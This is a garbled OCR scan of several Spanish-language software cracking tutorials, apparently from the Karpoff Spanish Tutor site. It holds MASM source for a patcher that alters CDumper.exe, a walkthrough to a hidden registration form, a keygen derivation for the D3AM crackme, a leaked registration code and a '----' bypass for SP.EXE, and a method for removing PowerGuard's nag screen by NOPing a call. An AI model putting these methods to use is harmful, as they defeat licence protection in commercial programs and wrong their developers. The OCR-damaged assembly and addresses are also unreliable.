; Este procedimiento chequea que el archivo CDumper.exe no esté parcheado 
¿ O que no sea de otra versión. 
; ReadFile lee nueve bytes a partir de la posición de donde se parchean 
; los cuatro bytes necesarios. Leo cinco bytes más para hacer la 
¿ comparación entre nueve bytes: 
; bytescorrectos -> contiene los bytes correctos de CDumper.exe v1.0 
; mientras que pDataMemory -> apunta a los bytes leidos 
; Yo asumo que CDumper.exe es la versión 1.0 sin parchear, si la 
¿ comparación de los nueve bytes es exitosa. Se pude hilar más fino. 
ControlDeArchivo PROC pDataMemor y : DWORD 
push esi 
push edi ; Salvo en la pila el valor de los registros que uso 
push ecx ; Para evitar errores 
push edx 
mov ecx, -1 
mov edi, pDataMemory ¿ edi apunta a los bytes leidos 
mov esi, offset bytescorrectos ; esi apunta a los bytes correctos 
ciclo: 
inc ecx 
cmp ecx, 9 ¿ Cuando ecx valga 9 se han comparado los 9 bytes 
je ok 
mov dl, byte ptr [edi+ecx] ¿ comparo un byte leido con uno de 
cmp dl, byte ptr [esit+ecx] ; los originales 
e ciclo 
jmp error 


mov eax, 666 ; Si la comparación falló retorno 666 en eax 
jmp salir 


mov eax, O ¿ Si la comparación fue exitosa retorno 0 en eax 


pop edx 
pop ecx 
pop edi ; Recupero los registros y retorno 
pop esi 
ret 
ControlDeArchivo ENDP 


Este es el procedimiento para saber si debemos parchear o no CDumper.exe. 


En el 


Si ya 


mismo 


códido se incluye la explicación del procedimiento. 


r 
¡Cierro el archivo y libero la memoria según corresponda 
CerrarArchivo PROC ddValor : DWORD 
invoke CloseHandle,hFile 
.1f ddValor != NULL ¿Solo si ddValor no es nulo se libera memoria 
invoke GlobalUnlock,pMemory 
invoke GlobalFree, hMemory 
.endif 
ret 
CerrarArchivo ENDP 


, 
end start 


Bueno, hemos llegado al último de los procedimientos. Solo sirve para cerrar 
CDumper.exe y liberar la memoria según ddValor, en caso de que se haya pedido memoria 
al sistema. 


Aca se termina la explicación del código fuente. Este es todo el patch. Para compilar 
el código fuente solo deben descomprimir CDumperPatchSrc.zip en un directorio, cargar 
MASM32, abrir el archico CDumperPatch.asm, ir a la opción Project del menu, y 


seleccionar Build All. Esto generará CDumperPatch.exe, que al ejecutarlo se verá algo 
así: 
CDumper v1.0 Patch Pa E 
Cracker 
SACCOPHARYNX 
Website 
http: 44 gmixor. cor 


Acerca de Salir 


Recuerden que antes de parchear a Cdumper.exe, por las dudas, es recomendable 
desinstalar este programa y borrar las entradas en la registry, volver a instalarlo 
pero sin ejecutarlo aún, aplicar el patch y luego ejecutarlo, y ahora sí, a disfrutar 
de la música. Ahora les voy a mostrar el otro punto de ataque. 


Otro punto de ataque 


Cuando se me ocurrió pasar el CDumper.exe por File InsPEctor vi que fue desarrollado 
en Borland Delphi 3.0, por lo tanto procedí a desensamblar con DEDE 3.0 y me llevé 
una pequeña sorpresa que es muy común últimamente. Los programadores ocultan los 
Forms de registración. Si desensamblan CDumper.exe y van a Forms, verán esto: 


DeDe y3. Ob lc] 1999- 2001 Le abba [olx] 


e Várchivos de e. +] El Process ss | Unknown 


“Classes Info | Units into || Foms | Procedures | Project | Esports | 


object PasswordDialog: TPasswordDialog 


TAboutForm 00108140 CORE 
TCDDB 00108340 ActiveContil = Edit 
TConfigurationDialog D010EE 44 


Border5tyle = bsDialog 


TCrossfaderForm 00115430 EE : 

TKaraokeForm 001197C0 o 

TLogicallCD Form 00114D14 Clientw'idth = 273 

TLoginDialog D014DB0C ParentFont = True 

TMainForm D014DF80 PixelsPerlnch = 96 

TNameCaptionForm 0014ED58 Position = poScreenCenter 

TNameCaptionFoarmD4  0014F140 TextHeight = 13 

TPasswordDialog 0014F568 object OKButton: TButton 

TPhysicalCD Form 0014F92C Left = 109 

TPluglninspectorForm 00156400 Top =38 

TRegDlg 00156424 o 

TSplashForm DO156E20 Height" > 
TThreeDForm 0018F464 y 


Ready 11 sec. [CDumper.exe ÍT711104 bytes | Lo 


Así es, existe un formulario para el ingreso del password y seguramente registración 
del software. Entoces vamos a buscar este formulario oculto. Si van a Help->About 
verán lo siguiente: 


About CDumper ma xj 


> 25811 CDumper version 1,0 
AA >; A s Copyright (C) 1998 by Emmanuel Ruiz £ tanier Muñoz, 
. DE .gmixon.com 


Notice: This computer program is protected by copyright laws and international 
treaties. Unauthonized reproduction or distribution of this program, or any portion. 
ofiít, may result ín severe civil and criminal penalties, and will be prosecuted to 
the maximum extent possible under the law. 


Si hacen dos clicks (no doble-click) sobre la imagen de este Form verán esto: 


> 
EMO 
“17 Register 
——Q CDumper version 1.0 _Betster_| 


Copyright (C) 1993 by Emmanuel Ruiz 8: lanier huñoz, 
www .gmixon.com 


Notice; This computer program is protected by copyright laws and international 
treaties. Unauthorized reproduction or distribution of this program, or any portion 
of ít, may result in severe civil and criminal penalties, and will be prosecuted to 
the maximum extent possible underthe law, 


Hemos habilitado el botón de registración (Register). Click sobre el mismo y: 


xi 


Passyeord: | 


coca _| 


No se preocupen que el tutorial termina aquí, Jejeje, pero quería mostrarles esto, 
para tener en cuenta que a veces puede haber más de un camino para alcanzar el éxito. 


Yo estuve traceando un buen rato, luego de poner el breakpoint más famoso en este 
mundo (bpx hmemcpy), pero debido a un imprevisto en la computadora no pude continuar 
con el traceo. Si alguien tiene la amabilidad de hacerlo por mí y mandarme un KeyGen, 
o al menos explicarme el algoritmo que comprueba que el password sea correcto, se lo 
agradecería mucho. Un dato: El password se guarda encriptado en la registry en la 
entrada GMixon. Abajo de todo está mi dirección de e-mail por si alguien hace algo o 
tiene dudas. 


Saludos 


¡Bueno colegas de todo el mundo, aquí se terminó este tutorial, de verdad, Jejeje. Se 
que se hizo extenso, pero quería que todo este bien explícito. Aprovecho para 
agradecer a Karpoff por enviarme unos archivos que necesitaba, y al resto de los 
crackers que aportan material al sitio. Sigamos así gente que la unión hace la 
fuerza. Saludos a todos. 


Desde las profundidades del abismo 


saccopharynxftyahoo.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 
Programa: Crackme! D3AM v1.0 DE DeAtH 


PROTECCION: Encontrar numero de serie Y Hacer KeyGenerador 
Describeion: Crackme para practicar en este mundo de la ingenieria inversa, se trata de encontrar el numero de serie 
paa correcto y ademas hacer un Generador de Keys 


Dificultad: Aconado 


DOWNLOAD: http: //come.to/karpoff 


Softice, W32dasm, y Bastantes Nociones sobre el Funcionamiento del Copro y en Sobremanera unas 
ordenes concretas 


CRACKER: Nandois FECHA: 01/02/2002 


Herramientas: 


| INTRODUCCION 
Hola!!! 


Este es un Crackme con el cual pasas de querer dejarlo todo para siempre mas, a ver lo alucinante que es este 
mundo de la ingenieria inversa y lo poco que sabes, de este mundo, al menos yo. 

De este Crack lo menos importante,es lo importante de un crack y es encontrar el numero de serie, pues realmente 
cuando tienes el numero de serie de un programa 

ya tienes lo que querias, poco importa, como lo has conseguido. 

Pero en este caso el Productor del crack, pedia para que el mismo se diera por resuelto que se tenia que hacer un 
generador del mismo. 

Y aqui es donde realmente se hace interesante la manera que DeAth se monto el numero y me complico la 
existencia. 

Basta de charla y vamos a ver el Crack. 


[o ALATAKE 


De entrada vemos con el Filel nspector, que usa UPX para comprimir el archivo 


vemos que se puede descomprimir sin problemas, y el archivo nos pasa de 13Kb a 50Kb, en fin una vez 
descomprimido lo corremos con el Wsdamm, pasamos un ratito con el y encontramos, un salto que una vez 
modificado nos dice que somos unos buenos crackers ect. ect.. 


Abrimos el Sice y despues de un breve paseo por él vemos en un lugar, que se origina un numero, 
cerramos el Sice ponemos el numero que vimos y jo, funciona. 

En un ratito hemos pillado un salto que hablando hipoteticamente, haciendole un pequeño cambio, nos 
registra el producto, y luego mirando un poco mas vemos que tenemos el numero que nos registra dicho 
producto, ya ni tan siquiera, tener que molestarnos en modificar el programa. 


Pues vaya, piensas, tecnicamente es una muy mala proteccion, pues no se puede decir que este muy bien 
protegido, es que no existe proteccion. 


Visto esto y muy contentos, nos metemos en la boca del lobo intentando hacer el generador de Keys del programa. Y aqui es 
donde no tiene desperdicio el montaje que hace DeAth. 


Vamos a por el; 


Lo primero que hay que tener presente es que el nombre de entrada tiene que tener como minimo " seis digitos " o mas. 
El segundo control que hace DeAtH es que el numero ó la clave que se ponga tiene que terminar con la letra " d ". 
Pasados estos dos controles, empieza el baile para la obtencion del numero de serie correcto. 


Primero coge los digitos, tercero y segundo y los multiplica. 
aqui tenemos la referencia a esta primera operacion. 


* Reference To: MSVBVM60, _vbaVarMul, Ord: 0000h 
:004068FF FFISOCIOAOLO Call dword ptr [0040109C] 


Guarda el resultado y va por la segunda operacion 
Para Esta operacion se utilizan el penultimo digito y el cuarto. 


* Reference To: MSVBVM60,  _vbaVarAdd, Ord: 0000h 


| 
:00406AC4 FF15F8104000 Call dword ptr [004010F8] 


:00406ACA 8D8DECFBFFFF lea ecx, dword ptr [ebp+FFFFFBEC] 
:00406ADO 50 push eax 


El resultado de la suma lo multiplica por dos dos veces. 


A continuacion al valor obtenido le añade el total que tenia de la multiplicacion 
anterior. 
Y guarda este total al que a partir de ahora llamaremos total. 


Siguiendo la manipulacion del nombre ahora se coge el quinto digito y se multiplica por tres el valor obtenido se añade al 
total generando un nuevo total 


Segimos, ahora se coge el primer digito y sexto digito. 
se multiplican y el valor se añade al total con lo cual tenemos un nuevo valor total. 


De momento como veis la elaboracion de la Key es una serie de operaciones aritmeticas facilonas y que hemos visto en 
muchos trabajos, y esto es lo que 
en su momento pensó DeAtH, y es a partir de aqui, que la cosa se lia. 


Voy a poner la siguiente operación y luego la comentamos. 


Este codigo empieza o esta dentro de la call401048. 
* Reference To: MSVBVM60,  vbaVarPow, Ord:0000h 


| 
:00406E48 FF1548104000 Call dword ptr [00401048] 


MOVSX EDX, DWORD ptr[ ESI +4] 
MOV[ESP+48], EDX 

FILD DWORD ptr[ESP+48] 

FSTP REALS8 ptr [ESP+20] 
MOVSX EDX, WORD ptr [ESI +08] 
MOV [ESP+48], EDX 

FILD DWORD ptr [ESP+48] 
FSTP REAL8 ptr [ESP+20] 


FLD REAL8 ptr [ESP+20] 


FSTP REAL8 ptr[ESP] 
FLD REAL8 ptr[ ESP-08] 
FSTP REAL8 ptr[ESP] 
FLD REAL8 ptr[ 7FEA6F98] 
FLD REAL8 ptr[ EBP+08] 
FCOMP st(1) 

FSTSW AX 

SAHF 

FLD REAL8 ptr[ EBP+08] 
FCOMP st(1) 

FSTSW AX 

SAHF 

FSTP st(0) 

FLD REAL8 ptr[ EBP+08] 
FLD REAL8 ptr[ebp+10] 
FXCH st(1) 

FSTP REAL8 ptr[ESP] 
FST REAL8[ESP+08] 
FSTCW WORD ptr [ESP] 
FSTCW WORD ptr [ESP+06] 
FLD REAL8 ptr[EDX] 


FSUBR st(1) 
EXCH st(1) 

FCHS 

F2XM1 

FLD1 

FADDP st(1), st 

FSCALE 

ESTP (1) 

FST REALS ptr [ESP] 
FLDCW WORD ptr[ESP!. 


Bien, aqui termina una serie de operaciones que como no tenia ni idea de lo 
que hacian, me hicieron hacer muchas cosas, entre ellas dejar el Crack para otro mas experimentado que yo, pero a base de 
hacer preguntas, y buscar, empezé a entender lo que hacia el crackme. 


Todo lo expuesto anteriormente es el paso siguiente en la elaboracion del numero bueno del crackme, se coge el segundo 
digito del nombre y se transforma en Real extendido (64bits) y luego le aplica una serie de operaciones con la que obtiene un 
numero en base 64bits. 


Como ejemplo vale decir que si el segundo digito fuera la letra " b ", que tiene un valor igual a 62hexa, despues de pasarlo a 
real-extendido 64bits el valor 

de 62 hexa seria igual a 4058800000000000. 

y este valor una vez pasadas las anteriores operaciones quedaria como 


40C2C20000000000.- 


Lo que no he podido conseguir ni llegar a saber es como y que operaciones se hacen para convertir un numero decimal a real 
extendido, lo pedi a muchos lugares, y, o no saben o no quieren contestar. 

Pero como lo que interesaba era hacer el generador, cuando uno no sabe bien como va la cosa , siempre se puede 
improvisar, y a base de unos inventos propios y mucho trabajo se consiguió. 


A partir de aqui se trabaja la elaboracion de la key en base real-extendido 16bits 


Una vez conseguido el valor que nos da la elaboracion del segundo digito, le sumamos el TOTAL que teniamos de las 
operaciones anteriores obteniendo un nuevo TOTAL pero recordad en base real-extendido 16bits. 

Acontinuacion coge los digitos tercero y primero los multiplica y el valor obtenido lo añade al total consiguiendo un nuevo 
TOTAL. 


Luego coge el cuarto digito por delante y el cuarto digito por detras los multiplica 
y su resultado lo añade al total con la que ya tenemos un nuevo TOTAL, 


Ahora para seguir mareando la perdiz, coge el ultimo digito del nombre y el cuarto por detras, los resta y el resultado lo 


| añade al total, con lo que ya tenemos un nuevo TOTAL. 
Ahora se coge la constante 65hexa, la multiplica por el total, y ya tenemos un nuevo TOTAL. 
Aqui realiza una operacion, que mas bien, parece de relleno, pues lo que hace es restar uno al total acumulado. 


A continuacion se coge la constante 5DC h. 1500 en decimal y se resta al total que teniamos, con lo cual ya tenemos un 
nuevo TOTAL. 


Las tres siguientes operaciones, en principio parecen tres simples multiplicaciones pero tienen su trampita, para despistados o 
agotados, de tanto meneo de numeros. 

Primero se coge el total y se multiplica por tres y obtenemos un nuevo total. 

despues cogemos el total y lo multiplicamos por dos y tenemos aqui la trampita, pues guardaremos el resultado obtenido 
como SUBTOTAL y TOTAL, 

A continuacion cogemos el total y lo multiplicamos por cuatro y asi obtenemos un nuevo TOTAL. 


La siguiente operacion se limita a sumar al total el subtotal que teniamos guardado, consiguiendo un nuevo TOTAL, 

Aqui decia que habia trampa, porque los numeros de las multiplicaciones son en real-extendido muy parecidos, y como 
llevaba un ritmo de ir descartando los subtotales que tenia, y siempre trabajaba con el ultimo total conseguido, en esta 
operacion anterior, sino estas, ala guay, en principio parece que sume el total dos veces, que es lo que me pareció a mi, y 
me llevo un ratito de culo, pues no cuadraban los resultados. 


Bien una vez aqui se coge el TOTAL se le resta 5F5B9FOh. que viene a ser en decimal 99990000, y conseguimos un nuevo 
TOTAL. 


Para seguir a partir de aqui hace las siguientes comprobaciones. 
primera si el resultado es positivo o negativo. 
SI EL RESULTADO ES POSITIVO 
Si es positivo mira si es inferior a 989680h. o 10000000decimal. 
si es inferior a 10000000, le suma al TOTAL los 10000000.- 
Y ya tenemos un nuevo TOTAL. 
SI EL RESULTADO ES NEGATIVO 
Si el resultado es negativo lo pasa a positivo con el mismo valor 
Y si es inferior a 10000000dec. le suma al total positivado los 
10000000dec. y ya tenemos un nuevo TOTAL. 


Ya casi lo tenemos, despues de tanta movida aun quiere mas, y coje la primera letra del nombre, la multiplica por dos, y el 
resultado lo suma al total, con lo cual obtenemos un nuevo TOTAL y definitivo. 


Solo falta transformar este total en base Real-extendido 64bits a decimal 
y ya tenemos el numero deseado. 


Bien no?. 

En principio es un trabajo bastante comun de obtener un numero en base a un nombre 

con una serie de operaciones, más o menos complejas. 

Lo que yo he encontrado muy bueno, es la introducción de unas operaciones, que los que no tenemos conocimientos muy 
profundos de la informatica, nos sorprenden y que considero que se tienen que conocer, y estas estan muy relacionadas, por 
los datos que he acumulado, con el funcionamiento de coprocesador, y como trabaja la FPU y la pila de la FPU, y el efecto 
FIFO, ultimo de entrar primero en salir. 

Yo en base a lo que he acumulado intentaré poner que hace cada orden. 


Veamos.. las instrucciones de carga (fld y fild) Float Load u Float | nteger Load respectivamente cargan un valor de una 
determinada direccion de memoria que puede ser de diferente tamaño y puede ir incluso indexada por algun registro... 
Ejemplos: 


fild Dword Ptr ds: [ MiVariable] 
Cargaria un entero de 32bits de la direccion de memoria "MiVariable" 


fld QWord Ptr ds: [eax] 
Cargaria un real de 64bits de la direccion de memoria direccionada por eax. 


Estas instrucciones introducen ese valor en la pila del coprocesador... esta pila es de tipo FIFO (First In First Out) es decir... si 
nosotros cargamos un valor en la pila con fld el primer valor que sacariamos en caso de hacer un fst seria este. 


| El funcionamiento es exactamente igual que el manejo de pila del propio procesador.. es decir.. las instrucciones push y pop 
... las Load serian el push y las Store serian el pop... 


Las diferencias son: 


Hay 8 posiciones de pila (vamos, esta limitado) 
Las posiciones de la pila son referenciadas por unos registros para poder trabajar con ellas. St(0) St(1)... 


St(0) siempre apunta al ultimo valor introducido en la pila.. este sera el primero en salir claro. 
St(1) al siguiente, etc ,etc 


Si nosotros realizamos un fadd st(0),st(1) la operacion es la siguiente. 
St(0) = St(0)+ St(1); 


Como ves es lo mismo que hacer un add solo que se trabaja con la pila del coprocesador y no con registros normales... para 
hacer util el resultado hay que extraerlo de la pila usando alguna instruccion de store... 


El unico problema que tiene esto es que si tu haces fadd st(3),st(5) ... el resultado queda en st(3) y antes de que salga este 
han de salir de la pila st(0),st(1) y st(2).... 


Las instrucciones de store toman un valor de la pila ( st(O) ) y lo almacenan en una posicion de memoria... 

Te las enumero: 

fst [Memoria] <-- Toma el valor de st(0) y lo introduce en la memoria correspondiente. 

fist [Memoria] <-- Toma el valor de st(0) lo convierte a entero y lo introduce en memoria. 

fistp [Memoria] <-- Toma el valor de st(0) lo elimina de la lista con lo cual st(1) pasa a ser st(0) , st(2) pasa a ser 
st(1), etc y lo introduce en memoria. 

fstp [Memoria] <--- Idem que la anterior pero sin conversion a entero. 


Memoria puede ser una constante ej: 
fstp ds: [MiVariable] 

o usando un registro para indexado ej: 
fist ds: [eax]. 


Como comprobareis no hay instrucciones para pasar un valor de un registro de proposito general a una posicion de pila de 
copro y encima solo podemos introducir y sacar al estilo pila... esto en principio es algo lioso de pillar y complica a veces la 
programacion de alguna ecuacion, pero una vez te has acostumbrado ya no es tanto trauma. 


Estas serian las operaciones principales, pero como habeis visto hay otras, que 
utiliza en este crack, que intentare explicar, y no son todas, porque hay un mogollon. 


FCOMP st(1) Esta es bastante facil pues lo que hace es en este caso comparar lo 
que hay en st (0), cima de la pila con st (1). 

FSTSW AX aqui solo he llegado a saber que guarda la palabra de estado de la 
FPU, en AX. Para ampliar esto necesitareis alguien mejor preparado 
que yo 

SAHF Aqui solo puedo decir que copia en los flegs del procesador los 

correspondientes bits de AH. 

FXCH st(1) Esta orden intercanbia los valores de st(0) y st(1) 

FYL2X esta es el siguiente calculo (st(1)*log2(st(0))). el que quiera que se 

entretenga con el. 

FRNDINT redondea el valor de st(0) al entero mas proximo y lo deja en st(0). 

F2XM1 esta es otro calculo, calcula 2 elevado a st(0)-1 y lo deja en st(0). 

aqui no me quedo claro si es 2elevado a st(0)-1 
O la operacion es 2 elevado a (st(0)-1), pero esta es la idea. 

FSCALE otra operacion, multiplica st(0)por 2 elevado a st(1) y como siempre 

deja el resultado en st(0). 


y termino, para los que saben de informatica a tope esto debe ser facilito 
pero, para los menos buenos, tiene su tela y es interesante saberlo y darse 
| una vuelta por las paginas de Intel ¡ Cia, para descubrir el copro. 


He terminado. 

Me lo puso muy mal el DeAtH, pero al final pude hacer el generador, no es que sea del todo correcto, tiene sus trampillas, 
pero funciona. 

Con todos estos datos al que le interese, puede hacerlo. 

supongo que habrá fallos de todo tipo, desde ortograficos a definiciones, 

me gustaria que me los comentarais, pues lo que hago, es para aprender yo y acepto todos los consejos. 


nandoistteleline.es 


AGRADECIMIENTOS. Los hay para mucha gente, pero en especial a Victor J urado 
y a Crick(que pesado soy, pero me ayudaste mucho) y como no a Karpoff. 
Hasta otra. 
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INTRODUCCIÓN 


Después de mucho leer, practicar y fallar. Algo he aprendido y eso es lo que pretendo compartir en este my 
primer tutorial ((( Espero que no sea el último ))). Tratare de explicar lo mejor que pueda todo lo que hice para 
encontrar el serial Valido justificando lo mejor que pueda cada PAso. 

La protección en si es bastante simple y será súper fácil de seguir 


Al ATAKE 


YAp, vamos al grano. Instalamos el Programa y no aparece nada extraño en el registro, no modifica ningún archivo de 
windows ((( entiendase autoecxec. bat, sistem.ini, win.ini ....etc ))), por tando solo tendremos que abocarnos al ejecutable 
SP.EXE el cual esta escrito en Visual C++ sin encriptar ni nada raro. 


Aunque solo usaremos el Softice para encontrar el numero de registro no esta de más sacarle una copia a SP.EXE 
... ((Gmás vale prevenir que curar o reinstalar!!!!))) 


Cargamos SP.EXE en Simbol loader del SOFTICE ... como ?¿ 


Muy simple, abrimos el Simbol loader del SOFTICE, le damos a a buscamos SP.EXE luego Ey 


aquí nos marca un error le damos al [$ =] y salta el SOFTICE en el punto de inicio del SP. 


Ahora con F5 dejamos correr el programa y aparece un linda ventanita de Registration la cual nos entrega un ID 


igual a 9TQ5R9-UVXA99-FRVKV2-C9BX79 y pide un Registration Code lo lógico seria que este ID sea distinto 
para cada PC ((suponiendo que dependiera del Hardware )) 
Si introducimos un Registration Code "691350" nos lanza una ventanita de error (ALgo Clasico no ?¿ ).. 


Ahora si que sip!!!! introducimos un Registration Code "691350" entramos al SOFTICE ((Ctrl +D )) empezamos 
con un Break-Point clásico, GetWindowTextA ((bpx getwindowtexta)) salimos del SOFTICE ((Ctrl +D )) le damos 


al botón y salta el SOFTICE producto del BPX. Apretamos un F12 para finalizar la rutina de la 


librería User32 y caemos de una en SP ...específicamente en el siguiente pedazo de código: 


FF1544565700 CALL [USER32!GetWindowTextA] 
8B4C2408 MOV ECX,[ESP+08] 

GAFF PUSH FF 

E821350000 CALL 0053350B 

EBO0C JMP 0052FFF8 

8B01 MOV EAX,[ECX] 

FF742408 PUSH DWORD PTR [ESP+08] 
FF9088000000 CALL [EAX+00000088] 

5E POP ESI 

C20400 RET 0004 


El cual no nos entrega mucha información y realmente no se que es lo que hace, pero después de unos pocos F10 
llegamos al ret de la rutina y salta al algo que es realmente interesante. 


8BOF 
33ED MOV ECX,[EDI] da 
33C0 XOR EBP,EBP EBP se deja en cero 
8BSIF8 XOR EAX,EAX EAX se deja en cero 
85D2 MOV EDX,[ECX-08] 
7E11 TEST EDX,EDX Ñ 
so3co12 E  004DOCDI (Cno jump ))))))) 
se 7501 CMP BYTE PTR [EAX+ECX], 2D se compara [EAX+ECX] con 2d 
004D0CC0** 45 JNZ  004D0CC7 Salta si no son iguales* 
40 INC  EBP Incrementa en 1 EBP 
si 3BC2 INC” EAX Incrementa en 1 EAX 
004D0CC7 * 7CF4 CMP EAX,EDX Compara EAX con EDX 
83FD04 JL 004D0CC0 Salta si es menor EAX** 
7451 CMP EBP, 04 Compara EBP con 4 
JZ 004D0D22 Salta si EBP es igual a 4 


Con una simple inspección el el registro ECX ((d ECX)) en la primera linea de codigo encontramos algo muy 
interesante... Sip el 691350 y ademas HDZ-4050-P9JFE-RT8TVI-12621 que te digo ?¿ es el Registeration Code que 
estábamos buscando. 


Pero como buen estudiante de Ingeniería Civil Química y aprendiz de Cracker no podia dejar la cosa asi::: 


Si miran con atención el trozo de código que esta destacado... mmmm lo notan?¿ Si-No aquí va my explicación. 
Primero noten como EBP y EAX se dejan en cero y a EDX se le asigna un valor que depende de la cantidad de guiones 
(-) que posea el Registeration Code. 

Se comienza comparando el elemento que esta en [EAX+ECX] ((( el primer numero del Registeration Code))) luego 
si es igual a '2D' (((2D es " - " en ASC))) no salta he incrementa EBP y EAX en 1 sino solo incrementa EAX ... Al ir 
creciendo EAX nos desplazamos un lugar dentro del code, es decir vamos elemento por elemento buscando los 
guiones '2D' dentro del Registeration Code y cada ves que encontramos uno aumentamos en uno el contador EBP 
((EBP cuenta los guiones)). 

Este ciclo se repite mientras EAX sea menor a EDX cuando EDX es igual a EXA se sale del ciclo y se compara 
EBP con 4 ((revisa si el Registeration Code tenia 4 guiones)) si se cumple logramos el éxito, sino nos envía la 
Ventanina indicando que el code es Erróneo..... 


Tenemos dos contadores uno que cuenta guiones (EBP) y otro (EAX) que permite avanzar elemento por 
elemento dentro del Registeration Code donde solo se revisan EDX elementos de este. Al terminar el 


ciclo se revisa si en los EDX elementos del Registeration Code se encontraron 4 guiones, si este es el 
caso el Registeration Code es aceptado 


SI toda esta teoría es cierta basaría con poner ---- como Registeration Code para ser aceptado... ADIVINEN QUE 
PASO 


El Programa es Gueno pero la Protección deja bastante que desear, aunque si buscan un buen sistema Tex/LaTeX para 
Giiindous te recomiendo Miktex el cual puedes en-contrar en sourceforge en forma totalmente gratuita bajo licencia 


Chaop !!!! 


Si algo no quedo muy claro o si cometi algun error no 
dudes en comunicarnelo 


Vuela tu Cabeza... Fuma DINAMITA !!!! 


My Web Pager:_http: www. udec. cl —rafgonza 
My dirección de e-mail: rafgonzaQudec. cl 


My dirección de e-mail: rafgonzaQudec. cl 
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Power Guard v1.0 (Sin Armadillo) 


Nag 

Eliminar la Nag con un metodo propuesto por Auspex 

Protege archivos hechos en PowerPoint mediante contraseñas. 
Muy Sencillo 


http://www.digitalcandle.com 


Softice, Editor Hexadecimal 


AUSPEX FECHA: 01/10/2002 


INTRODUCCION 


Este tutorial podría ser una continuación al que he escrito sobre el programa PowerGuard. Lo he separado por 
que se trata de eliminar una Nag, pero por medio de un método que se me ocurrió a lo largo del crack, un 
método que pienso yo que puede ser algo muy interesante de ver y estudiar, y por eso me gustaría compartirlo 
con todo el munndo. Quizas algún dia lo llamen el Método AuspexX, jejeeejee, eso sería estupendo. 


Estoy seguro de que a alguien se le habrá ocurrido alguna vez, asi que no pretendo decir que he descubierto 
algo nuevo y revolucionario, pero lo que si puedo decir es que jamas lo he leido en ningún tutorial, en 
ninguno, y creedme, he leido muchos. Por ese motivo quiero escribir este, y compartir toda la información 
que pueda transmitir, y si a alguno de los lectores ya se le había ocurrido la idea que voy a proponer, por 
favor, que no se sientan ofendidos. 


AL ATAKE 


Bueno, la cosa va de eliminar una Nag, concretamente esta ventanita: 


PowerGuard 
MOONLIGHT 


SOFTWARE 


SECURITY E SOFTWARE :: SOLUTIONS 


[res 00 


Estuve dandole vueltas a la cabeza a ver como eliminar esta sencilla nag y se me ocurrió una gran idea, os lo explicaré: 


Una feliz idea 


Cuando nosotros corremos un programa en Windows, que es un Sistema Operativo multitarea, éste reparte dichas 
tareas en el tiempo a cada aplicación que está ejecutándose en memoria (cada aplicación tendrá una prioridad u otra, 
Windows gestionará esto). Cuando nosotros estamos frente a una nag, el programa se encuentra en un bucle hasta que 
el usuario pulsa, por ejemplo, un botón de OK, entonces el programa sale del bucle y continua ejecutándose. Pues, ¿por 
qué no adentrarnos en dicho bucle?. Este loop se encontrará en una función, y con F12, pulsadas repetidas veces 
llegará un momento en el que se saldrá de dicha función principal. Una vez que nos salgamos desaparecerá Sice y 
estaremos de nuevo con la nag. Ahora sólo tenemos que pulsar OK, y Sice saltará él solito justo en el código que 
nosotros queremos. Estamos fuera de la función que provoca el bucle, y no nos ha hecho falta enganchar ninguna API 
ni nada por el estilo. 


¿Pero cómo hacemos esto?, ¿cómo nos metemos en el bucle?, vamos a ver, cuando estamos con la nag en panatalla y 
nos metemos en el Sice, no se está ejecutando el código del programa, sino otro que se encuentra en el núcleo del 
Sistema Operativo, kernell32.dll (en el Sice nos aparece con el nombre de acpi, ¿verdad?), por lo tanto nos hemos de 
meter en el espacio de memoria de nuestra aplicación y una vez alli, hemos de enganchar el flujo del proceso, es decir, 
encontrar las instrucciones por donde se está ejecutando el bucle y detenerlo. 


Para los que no hayan leido el tutorial que escribí sobre Armadillo 2.60, os diré que existen dos comandos clave para 
adentrarnos en la memoria de la aplicación: proc, addr CONTEXT. El primero nos dará una serie de datos sobre cada 
proceso que se está ejecutando, el que nos interesa a nosotros es Context. El segundo nos vale para meternos en su 
espacio de memoria. El proceso que lleva el asterísco es el que estamos depurando con Sice en ese momento. 


Para detener el bucle sólo basta con poner un bpr INICIO FIN r. INICIO y FIN son los rangos donde ustedes penseis 
que está dicho bucle, por ejemplo en una sección o, si no lo sabeis, en todo el ejecutable. 


Si ahora pulsais intro, al instante Sice saltará y ya estais en el bucle del proceso. Ahora pulsar F12 hasta que os salgais 
del Sice. Lo único que queda es pulsar el botón de continuar y listo, ya estamos fuera de la función que provoca el 
bucle, ahora depende de cada uno encontrar la llamada a la Nag, pero os aseguro que es sencillo, un par de Fl2 e ir 
comprobando mediante bpx donde se llama a la nag. 


Con este método que os propongo podeis solucionar muchos de los problemas que se os plantean a la hora de eliminar 
nag, o cualquier cosa en donde querais adentraros en su código con un click de ratón y no sepais la forma de hacerlo 
por que no se os ocurre la API correcta para adentraros, etc... Creo que puede ser una buena idea, ¿no?. 


Demostremos que el método funciona eliminado la nag de PowerGuard: 


Arrancamos el programa, y esperamos a que nos salga la nag. Ahora nos metemos en el Sice y buscamos el campo 
Context de PowerGuard con el comando proc, me sale D37D6F10. Ahora ponemos el comando addr D37D6F10 y 
pulsamos intro. Ya estamos en la memoria de PowerGuard, ahora pongamos un bpr 401000 494000 r (es la primera 
sección, CODE). Nos salimos y vemos como al instante Sice salta. Eliminamos el bpr (bc 0) y pulsamos F12 hasta que 
nos salgamos de Sice. Una vez fuera, pulsamos el botón OK y Sice vuelve a saltar, ya estamos donde queremos, ahora 
busquemos la posible llamada. En este caso después de unos cuantos F12 me encuentro que salgo de un CALL [EDX 
+ E8]. Se me ocurre poner un bpx en dicha llamada y volver a ejecutar la aplicación. Una vez que Sice salte, nos 
metemos dentro con F8 y ensamblamos un RET. Ya no volverá a salirnos nunca más la dichosa nag, pero existe un 
pequeño inconveniente, tampoco nos saldrán ciertas otras ventanas, aunque sin importancia. Lo que ha pasado es que 
hemos eliminado una función que se utiliza para sacar varias ventanas diferentes. La solución a esto es sencilla, 
comprobar si el programa pasa por el CALL [EDX + E8] una sola vez o varias. Sólo hemos de ejecutar y examinar la 
aplicación con el bpx en la llamada. Observamos que sólo pasa una vez y es para sacarnos la nag. Pués entonces sólo 
queda nopearla. 


NOTA IMPORTANTE: Cuidado con los Push, si los hay antes del CALL también habra que nopearlos para evitar un 
descuadre de la pila. No se os ocurra nopear nunca una llamada de este tipo a menos que esteis completamente seguros 
de lo que haceis, por que llama a direcciones que dependerán de un registro, lo que quiere decir es que dicha dirección 
